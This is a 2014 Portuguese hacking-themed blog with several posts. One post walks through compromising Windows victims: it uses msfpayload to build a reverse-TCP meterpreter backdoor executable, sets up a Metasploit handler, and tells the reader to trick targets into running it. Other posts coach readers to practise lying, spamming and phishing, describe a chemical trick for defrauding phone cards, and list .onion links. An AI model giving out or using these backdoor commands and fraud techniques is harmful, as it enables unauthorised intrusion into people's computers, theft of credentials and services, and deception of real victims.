Páginas

terça-feira, 2 de setembro de 2014

ModPacks para Minecraft

ModPack Minecraft Guerra Origens - Minecraft 1.6.4



Para jogar precisa de colocar no minímo 2GB de RAM. (Technic Launcher-Launcher Normal)
Modpack foi feito por luiz12272, todo o crédito ao criador.


Baixe pelo launcher Technic (Pirata/Original)
Download da pasta .minecraft (Baixar Launchers) (Lista dos mods)
http://www.mediafire.com/download/ay6p5y3mvrsnvb5/.minecraft.1.6.4+MINECRAFT-GUERRA-ORIGENS.rar





CREDITOS AO NOTURNO|NIGHT CRAWLER






Extra Keywords
ModPack Minecraft Guerra Origens - Minecraft 1.6.4
novo modpack Minecraft Guerra Origens
modpack Minecraft Guerra Origens
baixar modpack Minecraft Guerra Origens
download modpack Minecraft Guerra Origens
baixar minecraft modpack 1.6.4
download minecraft modpack 1.6.4
Como Instalar Mods no Minecraft 1.6.4
mods para minecraft 1.6.4
como baixar minecraft com mods 1.6.4
mods minecraft 1.6.4
pasta minecraft 1.6.4 com mods
download minecraft 1.6.4 com mods
como baixar mod para minecraft 1.6.4
como colocar mods no minecraft 1.6.4
.minecraft 1.6.4
Nightcrawlerplay, nightcrawler play, noturno
como instalar modpack minecraft
como instalar pasta .minecraft


sábado, 16 de agosto de 2014

Tutorial Como Invadir um Windows

Tutorial Como Invadir um Windows usando o Kali LinuxOlá pessoal!

Como vejo muitas pessoas com essas dúvidas simples venho com este post para resolver todas ou pelo menos boa parte delas. Muitas pessoas veem tutoriais, tools e scripts para fazer após invadir uma máquina com Windows, mas o que a maior parte delas é como invadir um windows. Como estou pensando em fazer vários posts com ferramentas para pós exploração primeiro tenho que sanar as dúvidas mais básicas. Então vamos a elas:

Como eu invado um Windows?

A cada dia que passa está cada vez mais difícil de conseguir um exploit que libere de cara acesso remoto, quem já usou o clássico net_api sabe do que me refiro, roda o exploit e já cai direto na shell do alvo. Hoje em dia, para você conseguir realmente invadir alguém você vai ter que primeiro descobrir o que a vítima tem instalado, que é a porta mais fácil para uma invasão bem sucedida. Temos exploits para Java (muitos), Adobe Reader, Word, Excel, Foxit Reader, entre outros. O que você pode fazer é convencer a vítima a baixar um arquivo infectado e com isso tomar o controle da máquina, este processo é conhecido como conexão reversa, porque no caso é o alvo que se conecta a você e não você diretamente no alvo. Isso é útil para caso o alvo tenha um firewall que impede que você chegue até a máquina, mas provavelmente ele não vai impedir que ele chegue até você.

Outro método muito utilizado é uma página infectada com algo malicioso que assim que a pessoa acessa o browser dispara uma instrução para algum programa que acessa a falha, libera o exploit e da a você o controle. Tem também outros métodos, como por exemplo um pendrive com um payload no autorun, assim que conectado infecta a máquina.

Mas a real é, de algum modo ou outro, você vai ter que convencer a vítima a fazer algo, acessar algo ou clicar em algo.

Mas e se a vítima não estiver na mesma rede que eu?

Todos os tutoriais disponíveis na internet, com algumas exceções, mostram os testes em ambientes controlados, normalmente em máquinas virtuais em uma mesma rede fechada. Isso facilita bastante se você tiver essa possibilidade, mas se não tiver não tem problema, nada impede que você mande um PDF infectado para alguém do outro lado do mundo e assim que ela clicar você tomar o controle da máquina, só tem algumas coisas a mais que você tem que cuidar, como por exemplo, ter um ip externo fixo, ter no seu roteador um redirecionador de portas para mandar a requisição que chegar na porta do roteador para a porta da sua máquina que já vai estar esperando a conexão reversa. Estou montando já um post sobre isso, aguarde...

Fiz exatamente igual ao tutorial e não funcionou, o que eu fiz de errado?

Talvez nada! Sim, pode ser que mesmo fazendo tudo certo como mostra o tutorial seu ataque não seja bem sucedido. Tem muitos fatores que podem influenciar o resultado de um ataque, como por exemplo, a versão do sistema do alvo, o idioma do sistema do alvo, a versão do programa vulnerável, compartilhamento ativado/desativado, firewall ativado/desativado, e muitas outras coisas.

Se seu ataque deu errado não desista, tente novamente com outro exploit. Métodos e falhas é o que mais tem por ai, não é difícil achar uma que dê certo para você.

Primeiramente vamos usar o comando msfpayload, uma ferramenta do framework do Metasploit para gerar apenas o payload executável para a vítima poder clicar.

O comando é super simples:


 msfpayload windows/meterpreter/reverse_tcp LHOST=”seu IP” LPORT=”porta para conexão” x > /root/backdoor.exe



Não precisa utilizar necessariamente a porta 4444 eu estou usando esta porque é a padrão do Metasploit. Agora o que eu fiz foi enviar esse arquivo executável para uma máquina windows e clicar nele lá. Mas antes da vítima executar precisamos ficar esperando a conexão na máquina atacante. Para isso vamos usar o exploit handler que pode ser encontrado em exploit/multi/handler no Metasploit. Inicie o Metasploit com o comando msfconsole e digite os seguintes comandos:

 use exploit/multi/handler  <-- Exploit que vai ser usado para aguardar a conexão
set payload windows/meterpreter/reverse_tcp  <-- Payload que será injetado assim que o alvo se conectar
set lhost 192.168.1.5  <-- IP do atacante
set lport 4444 <-- Porta setada no payload que foi enviado para a vítima, se colocar uma porta diferente aqui nunca chegará a conexão
exploit  <-- Rodar o exploit



Tudo pronto! Se chegamos até aqui é porque deu tudo certo, handler iniciado e aguardando a conexão. Agora sim a vítima pode clicar no executável: 




 com isso conseguimos o acesso ao alvo! Como pode ver estamos com a shell do meterpreter. O meterpreter é um lançador de comandos, como se fosse a shell. É o que vai interagir entre as duas máquinas. Vamos rodar alguns comandos interessantes aqui para termos certeza de que estamos de fato na máquina da vitima. Na imagem abaixo eu rodei o comando sysinfo do meterpreter para obter infomações da máquina que estou conectado e o comando shell para receber a shell do alvo. Na shell do alvo usei o comando dir para listar os diretórios da pasta atual.

sexta-feira, 15 de agosto de 2014

Como acessar a Deep Web pela TOR - The Onion Router

Para quem não sabe, a rede de internet  TOR ( The Onion Router) é conhecida também como parte da Deep Web ( ou Dark Web, Dark Net), é parte do lado obscuro da Internet. É chamada assim pelo fato de seu conteúdo ter de tudo e não ser possível acessar dos navegadores comuns (tais com Firefox, Explorer, Chrome) que só encontram sites da Surface Web, a rede em que você está agora. 

A rede TOR é quase anônima. A quantidade de conteúdo da TOR junto à outras redes que formam a Deep Web (I2P, Freenet, etc.) é extremamente superior a  tudo o que você conhece, vendo que lá contém de tudo, principalmente coisas ilegais e ruins: manuais de guerra, pornografia infantil, pedofilia, coisas psicóticas, comércio Ilegal de drogas e até sites que você contrata assassinos para matar alguém. Mas meu objetivo é introduzir os possíveis desafios que virão (como criptografia, por ex.), lá também contem vastas livrarias de e-books, hospedagem gratuita, e muito conteúdo sobre qualquer coisa que você imagine. Os domínios usados na rede TOR são com o sulfixo: ".onion" no final ( ao invés de ".com", ".com.br, ou ".net" como é ocasional de se ver) ou seja, um site lá seria assim: "seusite.onion" apesar de os nomes serem estranhos, aleatório e grandes ( um ex.: http://xmh57jrzrnw6insl.onion/)  Então aqui eu passo um tutorial de como entrar nas Redes TOR.
Tutorial

Primeiro: Entre em : https://www.torproject.org/download/download e escolha sua plataforma para download.

Segundo: Instale Tor Browser Bundle (navegador das redes TOR),  e  Vindalia Bundle ( ferramentas e estatísticas de rede completas),  caso você seja um usuário Linux nem precisa se preocupar muito, só instale o Tor Browser Bundle.

Terceiro: Instale os citados acima no seu computador, configure-o de modo que seja adequado pra você.

Quarto: Você se pergunta: "E agora o que eu faço"?
então aí vai a dica: Você vai precisar de um motor de busca (search engine) como o Google. Abaixo você confere tudo:



LINKS que você vai precisar para navegar na rede Tor:

Motor de Busca Torch: http://xmh57jrzrnw6insl.onion/
Tor Library : http://am4wuhz3zifexz5u.onion/
Onion Fileshare: http://f3ew3p7s6lbftqm5.onion/
Wikileaks: http://sx3jvhfgzhw44p3x.onion/  ou  http://zbnnr7qzaxlk5tms.onion/
Diretório com vários sites Tor: http://dppmfxaacucguzpc.onion/
Hospedagem Freedom Hosting: http://xqz3u5drneuzhaeo.onion/
Repositório de URLs  da Onion: http://32rfckwuorlf4dlv.onion/
Se quiser mais pode vir e pegar aqui, que foi de onde eu peguei: http://ahmia.fi/

Atenção:

Tenha cuidado com o que você baixa lá, certifique-se de que não é um Malware ou coisa do tipo, tenha cuidado com possíveis páginas Phishing, e sempre desconfie de coisas suspeitas.
A TOR é estudada a fundo por entusiastas, universitários e policiais que caçam pedófilos, por isso, tenha cuidado onde se mete, e o que faz!

Nós não nos responsabilizamos por possíveis danos causados por você ou por outros indivíduos em nenhum lugar. Este é apenas um tutorial, é tudo por sua conta.

Técnicas de Engenharia Social

É comum hoje notar engenheiros sociais, natos ou não, agindo não só ciberneticamente, como em casa, na TV, nas ruas, no mercado, estão presentes em todos os lugares, visando sair no lucro, ganhar informações ou mesmo roubar. Adiante veremos as técnicas mais usadas, o desenvolvimento delas, e os tipos de engenheiros sociais (não somos responsáveis pelo uso que você fará dessas informações):

  • Mentir - Eis a grande arte. Mente-se frio e calculadamente, a ponto do ouvinte/leitor acreditar uma ou poucas vezes ao saber do feito. Para isso o Engenheiro Social planeja e pensa cuidadosamente nos possíveis pensamentos e argumentos que virão na cabeça do leitor após ele saber/ler/ouvir/questionar, e a partir disso, ele prepara respostas, que quanto mais concretas, mas se justificam e tornam o contra-argumento sólido, e fazem o outro acreditar. Para se tornar um "mentiroso nato" ele precisa mentir demais, e observar aqueles que mentem. Para começar, minta hoje, amanhã, para todos, invente estórias que se tornarão "histórias", minta para seus amigos, para seus irmãos, para seu pai, para seu chefe, seu cachorro, minta para você! Cuidado com as más consequências, não invente coisas muito polêmicas, nem atordoantes pois se as pessoas para quem você mentiu não acreditarem, você já deve ter imaginado, você vai ter que inventar muitos argumentos, pode ficar nervoso, isso atrapalharia, ou mesmo pode deixar que pensam que aquilo seja verdade, na mente deles isso então se tornará verdade, portanto cuide com o que vai falar se você for treinar deste modo! A outra parte desse treino, talvez a mais difícil, é observar o jeito de mentir, tais como não ficar nervoso, não mudar o olhar várias vezes, falar com convicção e acreditar naquilo que está falando, procurar se expressar com o corpo de forma mais "invisível" possível. Após mentir, analisar e lembrar do jeito que você agiu, e se estudar e buscar melhorar no que poderia dar errado e no que pode melhorar. 
  • Spam - Muitos engenheiros sociais são spammers, fazem buscas avançadas nos motores de busca e arrecadam muitos emails e enviam para os mesmos desde anúncios mentirosos, que geralmente levam para uma página Phisher (página falsa que visa pegar informações suas tais como números e senhas de cartões de crédito, emails e senhas), ou então enviam arquivos como keyloggers ou trojans que abrem uma porta de conexão entre o ES e você, até que ele roube informações/ arquivos seus ou destrua seu computador. Criam emails falsos, geralmente emails parecidos com o das grandes empresas e corporações;
  • Phishing - Como já abordado, é o engenheiro social capaz de escrever páginas web que visam o roubo da informação por meio de páginas de internet. Geralmente copiam páginas de redes sociais ou bancos, só para terem acesso a sua senha e depois tomar posse do que é seu. Em sua maioria são programadores web natos, conhecem desde HTML a altos níveis de PHP e scripts. 
  • Stalking/Printing - São ótimos em procurar/achar informações de alguém para usar em seu benefício, analisam e vigiam uma pessoa, e por conseguinte conseguem definir-la e saber como lidar não só com ela como com qualquer tipo de público, como agrada-lo e na maioria das vezes obterem informações  sigilosas. Quando esse tipo de ES tem um objetivo, faz de tudo, passo a passo, para conseguir realiza-lo;
  • Designers-Marketing - Conseguem criar desde simples banners e logomarcas à animações em flash capazes de fazer o público alvo consumir e acreditar naquilo que está vendo e consumindo. Alguns fazem anúncios atrativos ou fraudulentos que conseguem bastantes visitantes e consumidores. Estudam, ao menos um pouco, as reações, os gostos, as consequências, e o estudo do design gráfico.
*Alguns dos itens acima podem ser considerados crimes previstos na constituição, tome cuidado ao usá-los/testá-los. Como já dito, o blog não se responsabiliza por nada que acontecer.

Como ter créditos infinitos no cartão telefônico? - Velho método

Velha técnica Phreaker que posto aqui (atrasado!) de como usar infinitamente (na teoria) os cartões de crédito.

Então vamos lá!: Irei introduzir o funcionamento de uma técnica, a do esmalte:

Introduzindo:

O cartão telefônico possui fusíveis que quando gasta-se uma certa quantidade de unidades (créditos) eles vão se queimando, então o que temos que fazer é impedir que esses fusíveis queimem para não gastar seus créditos!

Técnica do Esmalte

Pegue um cartão novo (ex: 20 unidades) e coloque em tíner entre 1 a 2 dias - ou então misture:
  1. soda caustica;
  2. querosene;
  3. acetona e
  4. aguá  sanitária.
Misture tudo em um pote (por exemplo) e coloque o cartão de molho e deixe uns 5 - 6 minutos, depois coloque luvas e com uma palha de aço, retire devagar a tinta sobre o catão. Depois passe esmalte (base) em cima dos fusíveis e deixe secar. Depois de seco, faça suas ligações, os fusíveis não vão mais queimar, ligações a vontade. 

Como deixar os vídeos do Youtube sem lag (Google Chrome)

Vamos lá ,Primeiro: 
  1. Abra seu navegador Google Chrome;
  2. Abra uma nova aba;
  3. Agora digite: "about:plugins" (sem aspas) e aperte "Enter";
  4. No topo você vai ver, um dos primeiros plugins: Adobe Flash Player
  5. Ao extremo lado direito do plugin, você verá escrito: "+ Detalhes", clique ali.
  6. Desative TODAS as versões antigas do Flash player e deixe apenas a atual;
  7. Agora ative ali em baixo no plugin do flash player: "Sempre permitido"
  8. sem clicar em mais nada, agora já pode fechar e abrir: http://www.youtube.com/
  9. Aproveite.